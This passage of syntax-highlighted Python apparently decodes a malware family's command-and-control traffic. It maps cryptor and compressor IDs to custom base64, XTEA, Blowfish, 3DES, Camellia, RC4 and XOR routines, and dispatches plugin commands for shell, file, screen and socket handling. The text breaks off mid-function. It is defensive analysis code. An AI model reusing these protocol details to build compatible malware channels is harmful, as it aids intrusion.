class="mh">0xC3</span><span class="p">,</span><span class="mh">0x22</span><span class="p">,</span><span class="mh">0xF2</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x0E</span><span class="p">,</span><span class="mh">0x17</span><span class="p">,</span><span class="mh">0xCC</span><span class="p">,</span><span class="mh">0x60</span><span class="p">,</span><span class="mh">0x5C</span><span class="p">,</span><span class="mh">0x51</span><span class="p">,</span><span class="mh">0xC2</span><span class="p">,</span><span class="mh">0x1D</span><span class="p">,</span><span class="mh">0x4A</span><span class="p">,</span><span class="mh">0xCB</span><span class="p">,</span><span class="mh">0x33</span><span class="p">,</span><span class="mh">0x1C</span><span class="p">,</span><span class="mh">0xF8</span><span class="p">,</span><span class="mh">0x66</span><span class="p">,</span><span class="mh">0x83</span><span class="p">,</span><span class="mh">0x6B</span><span class="p">,</span><span class="mh">0x3E</span><span class="p">,</span><span class="mh">0x27</span><span class="p">,</span><span class="mh">0xE3</span><span class="p">,</span><span class="mh">0x9F</span><span class="p">,</span><span class="mh">0xF5</span><span class="p">,</span><span class="mh">0x3A</span><span class="p">,</span><span class="mh">0xAA</span><span class="p">,</span><span class="mh">0x8A</span><span class="p">,</span><span class="mh">0x26</span><span class="p">,</span><span class="mh">0x7F</span><span class="p">,</span><span class="mh">0x5A</span><span class="p">,</span><span class="mh">0x42</span><span class="p">,</span><span class="mh">0xCF</span><span class="p">,</span><span class="mh">0x7C</span><span class="p">,</span><span class="mh">0x07</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x71</span><span class="p">,</span><span class="mh">0xEB</span><span class="p">,</span><span class="mh">0x05</span><span class="p">,</span><span class="mh">0xBA</span><span class="p">,</span><span class="mh">0x29</span><span class="p">,</span><span class="mh">0x4B</span><span class="p">,</span><span class="mh">0x7A</span><span class="p">,</span><span class="mh">0xE0</span><span class="p">,</span><span class="mh">0xEC</span><span class="p">,</span><span class="mh">0x9A</span><span class="p">,</span><span class="mh">0x7B</span><span class="p">,</span><span class="mh">0x2E</span><span class="p">,</span><span class="mh">0x37</span><span class="p">,</span><span class="mh">0xFE</span><span class="p">,</span><span class="mh">0xA4</span><span class="p">,</span><span class="mh">0xBE</span><span class="p">,</span><span class="mh">0x49</span><span class="p">,</span><span class="mh">0xDE</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0xC5</span><span class="p">,</span><span class="mh">0xBB</span><span class="p">,</span><span class="mh">0x96</span><span class="p">,</span><span class="mh">0xE9</span><span class="p">,</span><span class="mh">0xC4</span><span class="p">,</span><span class="mh">0x79</span><span class="p">,</span><span class="mh">0x99</span><span class="p">,</span><span class="mh">0x87</span><span class="p">,</span><span class="mh">0xF4</span><span class="p">,</span><span class="mh">0x13</span><span class="p">,</span><span class="mh">0x1A</span><span class="p">,</span><span class="mh">0x15</span><span class="p">,</span><span class="mh">0x63</span><span class="p">,</span><span class="mh">0xF9</span><span class="p">,</span><span class="mh">0xA0</span><span class="p">,</span><span class="mh">0xD1</span><span class="p">,</span><span class="mh">0x02</span><span class="p">,</span><span class="mh">0xD6</span><span class="p">,</span><span class="mh">0x09</span><span class="p">,</span><span class="mh">0x1F</span><span class="p">,</span><span class="mh">0xE5</span><span class="p">,</span><span class="mh">0x92</span><span class="p">,</span><span class="mh">0x6A</span><span class="p">,</span><span class="mh">0xE7</span><span class="p">,</span><span class="mh">0x18</span><span class="p">,</span><span class="mh">0x43</span><span class="p">,</span><span class="mh">0x91</span><span class="p">,</span><span class="mh">0x6E</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xC8</span><span class="p">,</span><span class="mh">0xA3</span><span class="p">,</span><span class="mh">0xB2</span><span class="p">,</span><span class="mh">0x2C</span><span class="p">,</span><span class="mh">0xEE</span><span class="p">,</span><span class="mh">0x8D</span><span class="p">,</span><span class="mh">0xA6</span><span class="p">,</span><span class="mh">0x5B</span><span class="p">,</span><span class="mh">0xEF</span><span class="p">,</span><span class="mh">0x24</span><span class="p">,</span><span class="mh">0xB9</span><span class="p">,</span><span class="mh">0x75</span><span class="p">,</span><span class="mh">0x57</span><span class="p">,</span><span class="mh">0x0F</span><span class="p">,</span><span class="mh">0x6F</span><span class="p">,</span><span class="mh">0x11</span><span class="p">,</span><span class="mh">0x47</span><span class="p">,</span><span class="mh">0x9B</span><span class="p">,</span><span class="mh">0x3B</span><span class="p">,</span><span class="mh">0x76</span><span class="p">,</span><span class="mh">0xE1</span><span class="p">,</span><span class="mh">0x9D</span><span class="p">,</span><span class="mh">0x64</span><span class="p">,</span><span class="mh">0x54</span><span class="p">,</span><span class="mh">0xA7</span><span class="p">,</span><span class="mh">0xC1</span><span class="p">,</span><span class="mh">0x55</span><span class="p">,</span><span class="mh">0xB3</span><span class="p">,</span><span class="mh">0x89</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0xFD</span><span class="p">,</span><span class="mh">0xAB</span><span class="p">,</span><span class="mh">0xB1</span><span class="p">,</span><span class="mh">0x94</span><span class="p">,</span><span class="mh">0xB6</span><span class="p">,</span><span class="mh">0x14</span><span class="p">,</span><span class="mh">0x2F</span><span class="p">,</span><span class="mh">0xF3</span><span class="p">,</span><span class="mh">0xBC</span><span class="p">,</span><span class="mh">0x69</span><span class="p">,</span><span class="mh">0xBF</span><span class="p">,</span><span class="mh">0xA1</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="mh">0x59</span><span class="p">,</span><span class="mh">0x0B</span><span class="p">,</span><span class="mh">0xBD</span><span class="p">,</span><span class="mh">0xC9</span><span class="p">,</span><span class="mh">0x2A</span><span class="p">,</span><span class="mh">0xD7</span><span class="p">,</span><span class="mh">0x81</span><span class="p">,</span><span class="mh">0x3C</span><span class="p">,</span><span class="mh">0x23</span><span class="p">,</span><span class="mh">0xD3</span><span class="p">,</span><span class="mh">0xF1</span><span class="p">,</span><span class="mh">0xFA</span><span class="p">,</span><span class="mh">0xEA</span><span class="p">,</span><span class="mh">0x39</span><span class="p">,</span><span class="mh">0x38</span><span class="p">,</span><span class="mh">0x9E</span><span class="p">,</span><span class="mh">0x5E</span><span class="p">,</span><span class="mh">0xB5</span><span class="p">,</span><span class="mh">0x45</span><span class="p">,</span><span class="mh">0x61</span><span class="p">,</span><span class="mh">0xFF</span><span class="p">,</span><span class="mh">0x4E</span><span class="p">,</span><span class="mh">0x77</span><span class="p">,</span><span class="mh">0x4D</span><span class="p">,</span><span class="mh">0x65</span><span class="p">,</span><span class="mh">0x9C</span><span class="p">,</span><span class="mh">0xE8</span><span class="p">,</span><span class="mh">0xD9</span><span class="p">,</span><span class="mh">0x93</span><span class="p">,</span><span class="mh">0xAF</span><span class="p">,</span><span class="mh">0x50</span><span class="p">,</span><span class="mh">0xA2</span><span class="p">,</span><span class="mh">0x84</span><span class="p">,</span><span class="mh">0x88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">,</span><span class="mh">0x98</span><span class="p">,</span><span class="mh">0xE2</span><span class="p">,</span><span class="mh">0x86</span><span class="p">,</span><span class="mh">0xCE</span><span class="p">,</span><span class="mh">0xDD</span><span class="p">,</span><span class="mh">0x8C</span><span class="p">,</span><span class="mh">0x8E</span><span class="p">,</span><span class="mh">0xA9</span><span class="p">,</span><span class="mh">0x95</span><span class="p">,</span><span class="mh">0x70</span><span class="p">,</span><span class="mh">0xAE</span><span class="p">,</span><span class="mh">0xE4</span><span class="p">,</span><span class="mh">0xCA</span><span class="p">,</span><span class="mh">0x62</span><span class="p">,</span><span class="mh">0xCD</span><span class="p">,</span><span class="mh">0x90</span><span class="p">,</span><span class="mh">0xC0</span><span class="p">,</span><span class="mh">0xFB</span><span class="p">,</span><span class="mh">0xB0</span><span class="p">,</span><span class="mh">0xDB</span><span class="p">,</span><span class="mh">0xB4</span><span class="p">,</span><span class="mh">0xD0</span><span class="p">,</span><span class="mh">0x97</span><span class="p">,</span><span class="mh">0xF0</span><span class="p">,</span><span class="mh">0x2D</span><span class="p">,</span><span class="mh">0x46</span><span class="p">,</span><span class="mh">0xDA</span><span class="p">,</span><span class="mh">0x6C</span><span class="p">,</span><span class="mh">0x6D</span><span class="p">,</span><span class="mh">0x44</span><span class="p">,</span><span class="mh">0x74</span><span class="p">,</span><span class="mh">0xA5</span><span class="p">,</span><span class="mh">0x8F</span><span class="p">,</span><span class="mh">0x56</span><span class="p">,</span><span class="mh">0x35</span><span class="p">]</span>
<span class="k">return</span> <span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">i</span><span class="p">)])</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">body</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">do_base64</span><span class="p">(</span><span class="n">body</span><span class="p">):</span>
<span class="n">standard_base64</span> <span class="o">=</span> <span class="s">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'</span>
<span class="n">custom_base64</span> <span class="o">=</span> <span class="s">'B7wAOjbXLsD+S24/tcgHYqFRdVKTp0ixlGIMCf8zvE5eoN1uyU93Wm6rZPQaJhkn'</span>
<span class="n">table</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">maketrans</span><span class="p">(</span><span class="n">custom_base64</span><span class="p">,</span> <span class="n">standard_base64</span><span class="p">)</span>
<span class="k">return</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">body</span><span class="o">.</span><span class="n">translate</span><span class="p">(</span><span class="n">table</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">xtea_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">iv</span><span class="p">,</span> <span class="n">buf</span><span class="p">):</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">xtea</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">mode</span> <span class="o">=</span> <span class="n">xtea</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">IV</span> <span class="o">=</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">return</span> <span class="n">x</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">blowfish_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">block_size</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="mi">8</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">ciphertext</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="mi">8</span><span class="p">))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">Blowfish</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="k">def</span> <span class="nf">des_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="mi">8</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="n">bs</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">ciphertext</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="n">bs</span> <span class="o">-</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span> <span class="o">%</span> <span class="n">bs</span><span class="p">))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">DES3</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">DES3</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="k">def</span> <span class="nf">camellia_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">ciphertext</span><span class="p">):</span>
<span class="n">bs</span> <span class="o">=</span> <span class="mi">16</span>
<span class="n">plaintext</span> <span class="o">=</span> <span class="s">""</span>
<span class="c"># print("c_dll -> key=%s , len(enc)=%d" % (key.encode('hex'), len(ciphertext)))</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="n">camellia</span><span class="o">.</span><span class="n">CamelliaCipher</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">key</span><span class="p">,</span> <span class="n">mode</span><span class="o">=</span><span class="n">camellia</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">),</span> <span class="n">bs</span><span class="p">):</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">ciphertext</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">bs</span><span class="p">]</span>
<span class="n">plaintext</span><span class="o">+=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">block</span><span class="p">)</span>
<span class="c"># print("c_dll -> len(dec)=%d" % (len(plaintext)))</span>
<span class="k">return</span> <span class="n">plaintext</span>
<span class="c">########################################### decode functions ########################################## </span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">36</span><span class="p">]</span>
<span class="n">year</span> <span class="o">=</span> <span class="n">header</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span>
<span class="c">#print "year = " + year.encode('hex')</span>
<span class="n">checksum</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="c">#print "checksum = " + hex(checksum)</span>
<span class="n">header_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="c">#print "header size = " + hex(header_size)</span>
<span class="n">body_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
<span class="c">#print "body size = " + hex(body_size)</span>
<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
<span class="c">#print "plain size = " + hex(plain_size)</span>
<span class="n">cryptor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">20</span><span class="p">:]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">header_size</span><span class="p">:</span><span class="n">header_size</span><span class="o">+</span><span class="n">body_size</span><span class="p">]</span>
<span class="k">if</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"51298f741667d7ed2941950106f50545"</span><span class="p">:</span> <span class="c"># default</span>
<span class="k">print</span> <span class="s">"crypto -> default"</span>
<span class="k">return</span> <span class="n">body</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"c30b1a2dcb489ca8a724376469cf6782"</span><span class="p">:</span> <span class="c"># rc4</span>
<span class="k">print</span> <span class="s">"crypto -> rc4"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="k">return</span> <span class="n">RC4</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"38be0f624ce274fc61f75c90cb3f5915"</span><span class="p">:</span> <span class="c"># Substitution</span>
<span class="k">print</span> <span class="s">"crypto -> Substitution"</span>
<span class="k">return</span> <span class="n">simple_substitution_cipher</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"ba0504fcc08f9121d16fd3fed1710e60"</span><span class="p">:</span> <span class="c"># base64</span>
<span class="k">print</span> <span class="s">"crypto -> base64"</span>
<span class="k">return</span> <span class="n">do_base64</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"b2e5490d2654059bbbab7f2a67fe5ff4"</span><span class="p">:</span> <span class="c"># XTEA in CBC mode</span>
<span class="k">print</span> <span class="s">"crypto -> XTEA"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">52</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="k">return</span> <span class="n">xtea_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">iv</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"2965e4a19b6e9d9473f5f54dfef93533"</span><span class="p">:</span> <span class="c"># Blowfish</span>
<span class="k">print</span> <span class="s">"decrypt -> Blowfish"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">52</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="k">return</span> <span class="n">blowfish_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"8746e7b7b0c1b9cf3f11ecae78a3a4bc"</span><span class="p">:</span> <span class="c"># XOR</span>
<span class="k">print</span> <span class="s">"decrypt -> xor"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">40</span><span class="p">]</span>
<span class="k">return</span> <span class="n">xor</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="n">key</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"46c5525904f473ace7bb8cb58b29968a"</span><span class="p">:</span> <span class="c"># 3DES</span>
<span class="k">print</span> <span class="s">"decrypt -> 3des"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">60</span><span class="p">]</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">60</span><span class="p">:</span><span class="mi">68</span><span class="p">]</span>
<span class="k">return</span> <span class="n">des_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cryptor_id</span> <span class="o">==</span> <span class="s">"9b1f6ec7d9b42bf7758a094a2186986b"</span><span class="p">:</span> <span class="c"># Camellia</span>
<span class="k">print</span> <span class="s">"decrypt -> camellia"</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span>
<span class="k">return</span> <span class="n">camellia_decrypt</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"crypto -> unknow :"</span> <span class="o">+</span> <span class="n">cryptor_id</span> <span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">decompress</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">28</span><span class="p">]</span>
<span class="n">header_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">body_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="n">compressor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">28</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">header_size</span><span class="p">:</span><span class="n">header_size</span><span class="o">+</span><span class="n">body_size</span><span class="p">]</span>
<span class="k">if</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"f37126ad88a5617eaf06000d424c5a21"</span><span class="p">:</span> <span class="c">#default</span>
<span class="k">print</span> <span class="s">"compressor -> default"</span>
<span class="k">return</span> <span class="n">body</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"5fd8ea0e9d0a92cbe425109690ce7da2"</span><span class="p">:</span> <span class="c">#zlib</span>
<span class="k">print</span> <span class="s">"compressor -> zlib"</span>
<span class="kn">import</span> <span class="nn">zlib</span>
<span class="k">return</span> <span class="n">zlib</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"503b6412c75a7c7558d1c92683225449"</span><span class="p">:</span> <span class="c"># aplib</span>
<span class="kn">import</span> <span class="nn">aplib</span>
<span class="k">return</span> <span class="n">aplib</span><span class="o">.</span><span class="n">depack_safe</span><span class="p">(</span><span class="n">body</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">compressor_id</span> <span class="o">==</span> <span class="s">"0a7874d2478a7713705e13dd9b31a6b1"</span><span class="p">:</span> <span class="c"># lzo</span>
<span class="n">plain_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="kn">import</span> <span class="nn">lzo</span>
<span class="k">return</span> <span class="n">lzo</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">body</span><span class="p">,</span> <span class="bp">False</span><span class="p">,</span> <span class="n">plain_size</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"compressor -> unknow : "</span> <span class="o">+</span> <span class="n">compressor_id</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">plugin_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="n">header</span> <span class="o">=</span> <span class="n">data</span><span class="p">[:</span><span class="mi">36</span><span class="p">]</span>
<span class="n">version</span> <span class="o">=</span> <span class="n">header</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">seq</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="n">status1</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
<span class="n">status2</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
<span class="n">processor_id</span> <span class="o">=</span> <span class="n">header</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">36</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">download_data</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"155bbf4a1efe1517734604b9d42b80e8"</span><span class="p">:</span> <span class="c"># default</span>
<span class="k">print</span> <span class="s">"processor -> default"</span>
<span class="n">download_plugin_header</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">32</span><span class="p">]</span>
<span class="n">download_plugin</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:]</span>
<span class="n">processor_default</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_plugin_header</span><span class="p">,</span> <span class="n">download_plugin</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"f47c51070fa8698064b65b3b6e7d30c6"</span><span class="p">:</span> <span class="c">#CMD file</span>
<span class="k">print</span> <span class="s">"processor -> file"</span>
<span class="n">processor_file</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"f46d09704b40275fb33790a362762e56"</span><span class="p">:</span> <span class="c">#CMD shell</span>
<span class="k">print</span> <span class="s">"processor -> shell"</span>
<span class="n">processor_shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"a3aecca1cb4faa7a9a594d138a1bfbd5"</span><span class="p">:</span> <span class="c">#CMD screen</span>
<span class="k">print</span> <span class="s">"processor -> screen"</span>
<span class="n">processor_screen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">processor_id</span> <span class="o">==</span> <span class="s">"77d6ce92347337aeb14510807ee9d7be"</span><span class="p">:</span> <span class="c">#CMD socket </span>
<span class="k">print</span> <span class="s">"processor -> socket"</span>
<span class="n">processor_socket</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"processor -> unknow: "</span> <span class="o">+</span> <span class="n">processor_id</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="c">########################################## processor functions ######################################## </span>
<span class="k">def</span> <span class="nf">processor_default</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_plugin_header</span><span class="p">,</span> <span class="n">download_plugin</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">plugin_data</span>
<span class="k">global</span> <span class="n">plugin_size</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 2 -> Processor::IsAuthed"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
